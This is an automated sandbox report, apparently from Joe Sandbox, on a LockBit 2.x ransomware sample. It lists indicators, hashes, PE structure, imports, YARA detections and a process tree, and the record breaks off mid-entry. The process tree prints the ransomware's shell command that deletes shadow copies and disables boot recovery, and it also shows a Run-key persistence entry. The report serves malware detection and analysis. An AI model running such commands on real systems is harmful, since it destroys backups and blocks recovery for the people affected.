http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion	Pna3t7DeL3.exe, 00000000.00000002.525537655.0000000006330000.00000004.00001000.00020000.00000000.sdmp, Restore-My-Files.txt8.0.dr, Restore-My-Files.txt101.0.dr, Restore-My-Files.txt134.0.dr, Restore-My-Files.txt257.0.dr, Restore-My-Files.txt103.0.dr, Restore-My-Files.txt50.0.dr, Restore-My-Files.txt119.0.dr, Restore-My-Files.txt64.0.dr, Restore-My-Files.txt98.0.dr, Restore-My-Files.txt57.0.dr, Restore-My-Files.txt159.0.dr, Restore-My-Files.txt11.0.dr, Restore-My-Files.txt205.0.dr, Restore-My-Files.txt174.0.dr, Restore-My-Files.txt36.0.dr, Restore-My-Files.txt225.0.dr, Restore-My-Files.txt228.0.dr, Restore-My-Files.txt89.0.dr, Restore-My-Files.txt254.0.dr, Restore-My-Files.txt71.0.dr	true	Avira URL Cloud: malware	unknown
http://...............Acrobat	annots.api.lockbit.0.dr	false	Avira URL Cloud: safe	low
http://a9.com/-/spec/opensearchrss/1.0/:totalResults	annots.api.lockbit.0.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	ppklite.api.lockbit.0.dr	false		high
https://decoding.at	Pna3t7DeL3.exe, 00000000.00000002.525537655.0000000006330000.00000004.00001000.00020000.00000000.sdmp, Restore-My-Files.txt8.0.dr, Restore-My-Files.txt101.0.dr, Restore-My-Files.txt134.0.dr, Restore-My-Files.txt257.0.dr, Restore-My-Files.txt103.0.dr, Restore-My-Files.txt50.0.dr, Restore-My-Files.txt119.0.dr, Restore-My-Files.txt64.0.dr, Restore-My-Files.txt98.0.dr, Restore-My-Files.txt57.0.dr, Restore-My-Files.txt159.0.dr, Restore-My-Files.txt11.0.dr, Restore-My-Files.txt205.0.dr, Restore-My-Files.txt174.0.dr, Restore-My-Files.txt36.0.dr, Restore-My-Files.txt225.0.dr, Restore-My-Files.txt228.0.dr, Restore-My-Files.txt89.0.dr, Restore-My-Files.txt254.0.dr, Restore-My-Files.txt71.0.dr	true	Avira URL Cloud: malware	unknown
https://tox.chat/download.html	Pna3t7DeL3.exe	true	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd	ppklite.api.lockbit.0.dr	false		high

World Map of Contacted IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.148
192.168.2.149
192.168.2.146
192.168.2.147
192.168.2.140
192.168.2.141
192.168.2.144
192.168.2.145
192.168.2.142
192.168.2.143
192.168.2.159
192.168.2.157
192.168.2.158
192.168.2.151
192.168.2.152
192.168.2.150
192.168.2.155
192.168.2.156
192.168.2.153
192.168.2.154
192.168.2.126
192.168.2.247
192.168.2.127
192.168.2.248
192.168.2.124
192.168.2.245
192.168.2.125
192.168.2.246
192.168.2.128
192.168.2.249
192.168.2.129
192.168.2.240
192.168.2.122
192.168.2.243
192.168.2.123
192.168.2.244
192.168.2.120
192.168.2.241
192.168.2.121
192.168.2.242
192.168.2.97
192.168.2.137
192.168.2.96
192.168.2.138
192.168.2.99
192.168.2.135
192.168.2.98
192.168.2.136
192.168.2.139
192.168.2.250
192.168.2.130
192.168.2.251
192.168.2.91
192.168.2.90
192.168.2.93
192.168.2.133
192.168.2.254
192.168.2.92
192.168.2.134
192.168.2.95
192.168.2.131
192.168.2.252
192.168.2.94
192.168.2.132
192.168.2.253
192.168.2.104
192.168.2.225
192.168.2.105
192.168.2.226
192.168.2.102
192.168.2.223
192.168.2.103
192.168.2.224
192.168.2.108
192.168.2.229
192.168.2.109
192.168.2.106
192.168.2.227
192.168.2.107
192.168.2.228
192.168.2.100
192.168.2.221
192.168.2.101
192.168.2.222
192.168.2.220
192.168.2.115
192.168.2.236
192.168.2.116
192.168.2.237
192.168.2.113
192.168.2.234
192.168.2.114
192.168.2.235
192.168.2.119
192.168.2.117
192.168.2.238
192.168.2.118
192.168.2.239
192.168.2.111
192.168.2.232

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	824744
Start date and time:	2023-03-12 06:34:06 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 20s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Pna3t7DeL3.exe
Original Sample Name:	111093146452b46071976d594172bc81d66427651f5f4cc244ddad9b3eae5c7d.bin.sample.exe
Detection:	MAL
Classification:	mal100.rans.spre.expl.evad.winEXE@30/1026@0/100
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 89% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, dllhost.exe, consent.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, VSSVC.exe, svchost.exe
Created / dropped Files have been reduced to 100
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:35:06	API Interceptor	2x Sleep call for process: Pna3t7DeL3.exe modified
06:35:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run {B35BA88F-AAAA-7B1F-859C-850F9029E88E} "C:\Users\user\Desktop\Pna3t7DeL3.exe"
06:35:19	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run {B35BA88F-AAAA-7B1F-859C-850F9029E88E} "C:\Users\user\Desktop\Pna3t7DeL3.exe"
06:35:21	API Interceptor	1x Sleep call for process: WMIC.exe modified

Process:	C:\Users\user\Desktop\Pna3t7DeL3.exe
File Type:	Windows desktop.ini
Category:	dropped
Size (bytes):	129
Entropy (8bit):	5.323600488446077
Encrypted:	false
SSDEEP:	3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
MD5:	A526B9E7C716B3489D8CC062FBCE4005
SHA1:	2DF502A944FF721241BE20A9E449D2ACD07E0312
SHA-256:	E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
SHA-512:	D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.689583854685715
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Pna3t7DeL3.exe
File size:	567808
MD5:	523190c8adb9f67f54bd299c9175d4e8
SHA1:	1a736dfd8806f898e529b0f713b4e7bc44f75742
SHA256:	111093146452b46071976d594172bc81d66427651f5f4cc244ddad9b3eae5c7d
SHA512:	5d687fc67221694e4227b5f7b11ab0caa6be64d647893ce25901a0282cc1040792691a7a8390b63581b33e52d2d466c97b9b0ceae1114e54a5a253d07a1c6fc6
SSDEEP:	12288:9SUCXw8ZeNj+qIpyt9xPRQ+KQmIStn3iHfVt+K:9SUDNOyxPq+PSt3i0K
TLSH:	BDC402123181E873D20583344D56DAF83AFAB7315E616BA7376C264F0F74AA19237F29
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.l...l...l..m#X..l...>[..l...>M..l.......l...l...l...>J..l...>Z..l...>_..l..Rich.l..................PE..L...s..b...........

Entrypoint:	0x405eee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6210B173 [Sat Feb 19 08:59:31 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	915857a0c1b1198d919ed99e3d150aa9

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14fac	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x27e5000	0xd2c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1210	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4388	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1c8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14a04	0x14c00	False	0.5391330948795181	data	6.330511545577577	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x16000	0x27ce0cc	0x68600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x27e5000	0xd2c8	0xd400	False	0.45681014150943394	data	4.982907243404611	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country
RT_ICON	0x27e5520	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27e5be8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27e6150	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27e71f8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Mexico
RT_ICON	0x27e76a0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Spanish	Mexico
RT_ICON	0x27e7f48	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Spanish	Mexico
RT_ICON	0x27ea4f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Spanish	Mexico
RT_ICON	0x27eb5c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Spanish	Mexico
RT_ICON	0x27ec470	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Spanish	Mexico
RT_ICON	0x27ecd18	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Spanish	Mexico
RT_ICON	0x27ed3e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Spanish	Mexico
RT_ICON	0x27ed948	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Spanish	Mexico
RT_ICON	0x27efef0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Spanish	Mexico
RT_ICON	0x27f0f98	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Spanish	Mexico
RT_ICON	0x27f1920	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Spanish	Mexico
RT_STRING	0x27f2000	0x148	data	Spanish	Mexico
RT_STRING	0x27f2148	0x17c	data	Spanish	Mexico
RT_ACCELERATOR	0x27f1e00	0x90	data	Spanish	Mexico
RT_GROUP_ICON	0x27eb598	0x30	data	Spanish	Mexico
RT_GROUP_ICON	0x27f1d88	0x76	data	Spanish	Mexico
RT_GROUP_ICON	0x27e7660	0x3e	data	Spanish	Mexico
RT_VERSION	0x27f1eb0	0x150	data
None	0x27f1e90	0xa	data	Spanish	Mexico
None	0x27f1ea0	0xa	data	Spanish	Mexico

DLL	Import
KERNEL32.dll	GetNumberOfConsoleInputEvents, GetStringTypeExW, GetConsoleTitleW, CreateFileW, Module32FirstW, GetConsoleAliasW, SetComputerNameW, GetSystemWindowsDirectoryA, GlobalUnlock, FindFirstVolumeMountPointA, CreateDirectoryExW, ZombifyActCtx, GetLogicalDriveStringsA, ReadConsoleInputW, GetTempPathW, GetCurrentDirectoryW, DebugBreak, LCMapStringA, GetProcAddress, LocalAlloc, GetBinaryTypeA, SetThreadUILanguage, GetHandleInformation, FindNextFileA, CompareStringA, LoadLibraryW, CreateNamedPipeA, GlobalFlags, GetModuleHandleA, CopyFileW, CreateActCtxA, lstrlenA, TlsAlloc, CreateActCtxW, DeleteVolumeMountPointA, MoveFileWithProgressW, CreateMailslotW, WriteConsoleInputA, InterlockedExchangeAdd, EnumTimeFormatsA, FindFirstFileW, FreeEnvironmentStringsW, VerifyVersionInfoW, GlobalAlloc, GetTickCount, SetLastError, GetLastError, CreateFileA, UnhandledExceptionFilter, LoadLibraryA, SetUnhandledExceptionFilter, DeleteFileA, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, HeapFree, GetModuleHandleW, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RaiseException, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle
USER32.dll	GetCursorInfo
GDI32.dll	GetBrushOrgEx

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 12, 2023 06:35:06.886888027 CET	49702	135	192.168.2.3	192.168.2.1
Mar 12, 2023 06:35:09.886729002 CET	49702	135	192.168.2.3	192.168.2.1

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 12, 2023 06:35:06.886938095 CET	192.168.2.1	192.168.2.3	8278	(Port unreachable)	Destination Unreachable
Mar 12, 2023 06:35:09.886817932 CET	192.168.2.1	192.168.2.3	8278	(Port unreachable)	Destination Unreachable

Target ID:	0
Start time:	06:34:59
Start date:	12/03/2023
Path:	C:\Users\user\Desktop\Pna3t7DeL3.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Pna3t7DeL3.exe
Imagebase:	0x400000
File size:	567808 bytes
MD5 hash:	523190C8ADB9F67F54BD299C9175D4E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.520342340.0000000002E46000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: MAL_EXE_LockBit_v2, Description: Detection for LockBit version 2.x from 2011, Source: 00000000.00000002.514046466.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Silas Cutler, modified by Florian Roth Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.514046466.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.514046466.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000002.514046466.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000002.514046466.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Lockbit_89e64044, Description: unknown, Source: 00000000.00000002.514046466.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Ransomware_Lockbit_a1c60939, Description: unknown, Source: 00000000.00000002.514046466.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: MAL_EXE_LockBit_v2, Description: Detection for LockBit version 2.x from 2011, Source: 00000000.00000003.259381395.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, Author: Silas Cutler, modified by Florian Roth Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000003.259381395.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.259381395.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.259381395.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000003.259381395.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Lockbit_89e64044, Description: unknown, Source: 00000000.00000003.259381395.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Lockbit_a1c60939, Description: unknown, Source: 00000000.00000003.259381395.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_EXE_LockBit_v2, Description: Detection for LockBit version 2.x from 2011, Source: 00000000.00000002.523259180.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Author: Silas Cutler, modified by Florian Roth Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.523259180.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000002.523259180.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Lockbit_89e64044, Description: unknown, Source: 00000000.00000002.523259180.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Lockbit_a1c60939, Description: unknown, Source: 00000000.00000002.523259180.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.523259180.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Target ID:	3
Start time:	06:35:12
Start date:	12/03/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Imagebase:	0x7ff707bb0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	4
Start time:	06:35:14
Start date:	12/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	5
Start time:	06:35:17
Start date:	12/03/2023
Path:	C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):	false
Commandline:	vssadmin delete shadows /all /quiet
Imagebase:	0x7ff67a9f0000
File size:	145920 bytes
MD5 hash:	47D51216EF45075B5F7EAA117CC70E40
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	12
Start time:	06:35:20
Start date:	12/03/2023
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic shadowcopy delete
Imagebase:	0x7ff6bb420000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	15
Start time:	06:35:25
Start date:	12/03/2023
Path:	C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):	false
Commandline:	bcdedit /set {default} bootstatuspolicy ignoreallfailures
Imagebase:	0x7ff63bbc0000
File size:	461824 bytes
MD5 hash:	6E05CD5195FDB8B6C68FC90074817293
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Target ID:	16
Start time:	06:35:26
Start date:	12/03/2023
Path:	C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):	false
Commandline:	bcdedit /set {default} recoveryenabled no
Imagebase:	0x7ff63bbc0000
File size:	461824 bytes
MD5 hash:	6E05CD5195FDB8B6C68FC90074817293
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Target ID:	18
Start time:	06:35:27
Start date:	12/03/2023
Path:	C:\Users\user\Desktop\Pna3t7DeL3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Pna3t7DeL3.exe"
Imagebase:	0x400000
File size:	567808 bytes
MD5 hash:	523190C8ADB9F67F54BD299C9175D4E8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.351105527.0000000002C1C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: MAL_EXE_LockBit_v2, Description: Detection for LockBit version 2.x from 2011, Source: 00000012.00000003.328749444.0000000004940000.00000004.00001000.00020000.00000000.sdmp, Author: Silas Cutler, modified by Florian Roth Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000003.328749444.0000000004940000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000012.00000003.328749444.0000000004940000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000012.00000003.328749444.0000000004940000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Lockbit_89e64044, Description: unknown, Source: 00000012.00000003.328749444.0000000004940000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Lockbit_a1c60939, Description: unknown, Source: 00000012.00000003.328749444.0000000004940000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_EXE_LockBit_v2, Description: Detection for LockBit version 2.x from 2011, Source: 00000012.00000002.353255484.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Author: Silas Cutler, modified by Florian Roth Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.353255484.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000012.00000002.353255484.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Lockbit_89e64044, Description: unknown, Source: 00000012.00000002.353255484.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Lockbit_a1c60939, Description: unknown, Source: 00000012.00000002.353255484.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000012.00000002.353255484.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_EXE_LockBit_v2, Description: Detection for LockBit version 2.x from 2011, Source: 00000012.00000002.350029244.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Silas Cutler, modified by Florian Roth Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000012.00000002.350029244.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.350029244.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000012.00000002.350029244.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000012.00000002.350029244.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Lockbit_89e64044, Description: unknown, Source: 00000012.00000002.350029244.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Ransomware_Lockbit_a1c60939, Description: unknown, Source: 00000012.00000002.350029244.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low

Target ID:	26
Start time:	06:35:37
Start date:	12/03/2023
Path:	C:\Users\user\Desktop\Pna3t7DeL3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Pna3t7DeL3.exe"
Imagebase:	0x400000
File size:	567808 bytes
MD5 hash:	523190C8ADB9F67F54BD299C9175D4E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001A.00000002.349816093.0000000002CCC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: MAL_EXE_LockBit_v2, Description: Detection for LockBit version 2.x from 2011, Source: 0000001A.00000003.345995509.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, Author: Silas Cutler, modified by Florian Roth Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000001A.00000003.345995509.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000003.345995509.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 0000001A.00000003.345995509.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001A.00000003.345995509.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Lockbit_89e64044, Description: unknown, Source: 0000001A.00000003.345995509.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Lockbit_a1c60939, Description: unknown, Source: 